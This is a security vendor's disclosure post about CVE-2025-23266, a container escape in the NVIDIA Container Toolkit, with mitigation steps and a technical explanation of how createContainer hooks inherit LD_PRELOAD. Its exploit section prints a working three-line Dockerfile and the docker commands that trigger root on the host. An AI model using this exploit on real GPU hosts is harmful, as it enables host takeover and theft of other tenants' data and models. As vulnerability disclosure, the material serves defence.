NVIDIAScape - Critical NVIDIA AI Vulnerability: A Three-Line Container Escape in NVIDIA Container Toolkit (CVE-2025-23266)

New critical vulnerability with 9.0 CVSS presents systemic risk to the AI ecosystem, carries widespread implications for AI infrastructure.

7 minute read

Executive Summary

Wiz Research discovered a critical container escape vulnerability in the NVIDIA Container Toolkit (NCT), which we've dubbed #NVIDIAScape. This toolkit powers many AI services offered by cloud and SaaS providers, and the vulnerability, now tracked as CVE-2025-23266, has been assigned a CVSS score of 9.0 (Critical). It allows a malicious container to bypass isolation measures and gain full root access to the host machine. This flaw stems from a subtle misconfiguration in how the toolkit handles OCI hooks, and it can be exploited with a stunningly simple three-line Dockerfile.

Because the NVIDIA Container Toolkit is the backbone for many managed AI and GPU services across all major cloud providers, this vulnerability represents a systemic risk to the AI ecosystem, potentially allowing attackers to tear down the walls separating different customers, affecting thousands of organizations.

The danger of this vulnerability is most acute in managed AI cloud services that allow customers to run their own AI containers on shared GPU infrastructure. In this scenario, a malicious customer could use this vulnerability to run a specially crafted container, escape its intended boundaries, and achieve full root control of the host machine. From there, the attacker could access, steal, or manipulate the sensitive data and proprietary models of all other customers running on the same shared hardware.

This is exactly the class of vulnerability that has proven to be a systemic risk across the AI cloud. A few months ago, Wiz Research demonstrated how similar container escape flaws allowed access to sensitive customer data in major services like Replicate and DigitalOcean. The recurrence of these fundamental issues highlights the urgent need to scrutinize the security of our core AI infrastructure as the world races to adopt it.

Mitigation and Recommendations

Affected Components: 

  • NVIDIA Container Toolkit: All versions up to and including v1.17.7 (CDI mode only for versions prior to 1.17.5) 

  • NVIDIA GPU Operator: All versions up to and including 25.3.1 

The primary recommendation is to upgrade to the latest version of the NVIDIA Container Toolkit as advised in the NVIDIA security bulletin.


Find vulnerable instances with Wiz

Wiz customers can use this pre-built query in the Wiz Threat Intel Center to find vulnerable instances of the NVIDIA Container Toolkit in their environment.

Prioritization and Context

Patching is highly recommended for all container hosts running vulnerable versions of the toolkit. Since the exploit is delivered inside the container image itself, We advise prioritizing hosts that are likely to run containers built from untrusted or public images. Further prioritization can be achieved through runtime validation to focus patching efforts on instances where the vulnerable toolkit is actively in use.

It is important to note that internet exposure is not a relevant factor for triaging this vulnerability. The affected host does not need to be publicly exposed. Instead, initial access vectors may include social engineering attempts against developers, supply chain scenarios where an attacker has prior access to a container image repository, or any environment that allows users to load arbitrary images.


Technical Mitigations

For systems that cannot be immediately upgraded, NVIDIA has provided several mitigation options. The primary method is to opt out of using the enable-cuda-compat hook, which is the source of the exposure.

For NVIDIA Container Runtime

When using the NVIDIA Container Runtime in legacy mode, you can disable the hook by editing the /etc/nvidia-container-toolkit/config.toml file and setting the features.disable-cuda-compat-lib-hook flag to true:

[features]
disable-cuda-compat-lib-hook = true

For NVIDIA GPU Operator

When using the NVIDIA GPU Operator, you can disable the hook by adding disable-cuda-compat-lib-hook to the NVIDIA_CONTAINER_TOOLKIT_OPT_IN_FEATURES environment variable. This can be done by including the following arguments when installing or upgrading the GPU Operator with Helm:

--set
"toolkit.env[0].name=NVIDIA_CONTAINER_TOOLKIT_OPT_IN_FEATURES" \
--set
"toolkit.env[0].value=disable-cuda-compat-lib-hook"

Note: Any other feature flags should be added as a comma-separated list to the value field.

For users with a GPU Operator version prior to 25.3.1, you can deploy the patched NVIDIA Container Toolkit version 1.17.8 by including the following arguments in your Helm command:

--set "toolkit.version=v1.17.8-ubuntu20.04"

Note: For Red Hat Enterprise Linux or Red Hat OpenShift, you must specify the v1.17.8-ubi8 tag.

Why research the NVIDIA Container Toolkit?

The entire AI revolution is built on the power of NVIDIA GPUs. In the cloud, the critical component that securely connects containerized applications to these GPUs is the NVIDIA Container Toolkit.

This is not the first time we've uncovered severe vulnerabilities in this core component. Last year, Wiz Research disclosed CVE-2024-0132, a similar container escape flaw that allowed for a full host takeover. These findings are part of our ongoing research into the security of the AI supply chain. We are investigating every layer of the AI stack, from the infrastructure (Hugging Face, Replicate, SAP AI Core) to the models themselves and the software used to run them (Ollama), to understand the real-world risks as the world races to adopt this new technology.

Technical Analysis

The path to this container escape lies not in a complex memory corruption bug, but in the subtle interplay between the container specification, a trusted host component, and a classic Linux trick. Understanding the exploit requires looking at three key parts: the OCI hook mechanism, the specific flaw in NVIDIA's implementation, and the weaponization of that flaw.


Understanding OCI Hooks and the NVIDIA Container Toolkit

The Open Container Initiative (OCI) specification defines a standard for container runtimes. Part of this standard is a "hook" system, which allows tools to run scripts at specific points in a container's lifecycle. The NVIDIA Container Toolkit (NCT) uses these hooks to perform its primary function: configuring a container to be able to communicate with the host's NVIDIA drivers and GPUs.

When a container is started with the NVIDIA runtime, the NCT registers several hooks, including the following createContainer hook:

"createContainer": [
  {
    "path": "/usr/bin/nvidia-ctk",
    "args": ["nvidia-ctk", "hook", "enable-cuda-compat", "..."]
  },
  ...
]

This hook runs as a privileged process on the host to set up the necessary environment for the container. 


The OCI spec defines different types of hooks. While prestart hooks run in a clean, isolated context, createContainer hooks have a critical property: they inherit environment variables from the container image unless explicitly configured not to

According to the OCI specification on Github:

“… on Linux this would happen before the pivot_root operation is executed but after the mount namespace was created and setup.”.


Weaponizing the environment variables

With the ability to control the environment of the privileged hook, an attacker has many options. One of the most direct is to abuse LD_PRELOAD, a well-known and powerful Linux environment variable. LD_PRELOAD forces a process to load a specific user-defined shared library (.so file).

By setting LD_PRELOAD in their Dockerfile, an attacker could instruct the nvidia-ctk hook to load a malicious library. Making matters worse, the createContainer hook executes with its working directory set to the container's root filesystem. This means the malicious library can be loaded directly from the container image with a simple path, completing the exploit chain.

The Exploit: A Three-Line Docker File

One of the most alarming aspects of this vulnerability is its simplicity. An attacker only needs to build a container image with a malicious payload and the following three-line Dockerfile.

The Malicious Dockerfile:

FROM busybox
ENV LD_PRELOAD=/proc/self/cwd/poc.so
ADD poc.so /

When this container is run on a vulnerable system, the nvidia-ctk createContainer hook inherits the LD_PRELOAD variable. Since the hook's working directory is the container's filesystem, it loads the attacker's poc.so file into its own privileged process, instantly achieving a container escape.

To prove this, our poc.so payload simply runs the id command and writes the output to /owned on the host.

Running the exploit:

# Build the malicious container
$ docker build . -t nct-exploit

# Run it on a host with the vulnerable NVIDIA Container Toolkit
$ docker run --rm --runtime=nvidia --gpus=all nct-exploit

The result: Root on the Host

Responsible Disclosure Timeline

  • May 17, 2025: Initial vulnerability report sent to NVIDIA in Pwn2Own Berlin.

  • July 15, 2025: NVIDIA published the security bulletin and assigned CVE-2025-23266.

  • July 17, 2025: Wiz Research publishes this blog post.

Conclusion

When discussing AI security, this vulnerability once more highlights that the most real and immediate risk to AI applications today comes from their underlying infrastructure and tooling. While the hype around AI security risks tends to focus on futuristic, AI-based attacks, “old-school” infrastructure vulnerabilities in the ever-growing AI tech stack remain the immediate threat that security teams should prioritize.

This practical attack surface is the result of the fast-paced introduction of new AI tools and services. It is therefore vital that security teams work closely with their AI engineers to gain visibility into the architecture, tooling, and AI models being used. Specifically, as this vulnerability demonstrates, it is important to build a mature pipeline for running AI models with full control over their source and integrity.

Additionally, this research highlights, not for the first time, that containers are not a strong security barrier and should not be relied upon as the sole means of isolation. When designing applications, especially for multi-tenant environments, one should always “assume a vulnerability” and implement at least one strong isolation barrier, such as virtualization (as explained in the PEACH framework). Wiz Research has written about this issue extensively, and you can read more about it in our previous research on Alibaba Cloud, IBM, Azure, Hugging Face, Replicate, and SAP.

Stay in touch!

Hi there! We are Nir Ohfeld (@nirohfeld), Sagi Tzadik (@sagitz_), Ronen Shustin (@ronenshh), Hillai Ben-Sasson (@hillai), Andres Riancho (@andresriancho) and Yuval Avrahami (@yuvalavra) from the Wiz Research Team (@wiz_io). We are a group of veteran white-hat hackers with a single goal: to make the cloud a safer place for everyone. We primarily focus on finding new attack vectors in the cloud and uncovering isolation issues in cloud vendors and service providers. We would love to hear from you! Feel free to contact us on X (Twitter) or via email: research@wiz.io. 

Continue reading

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management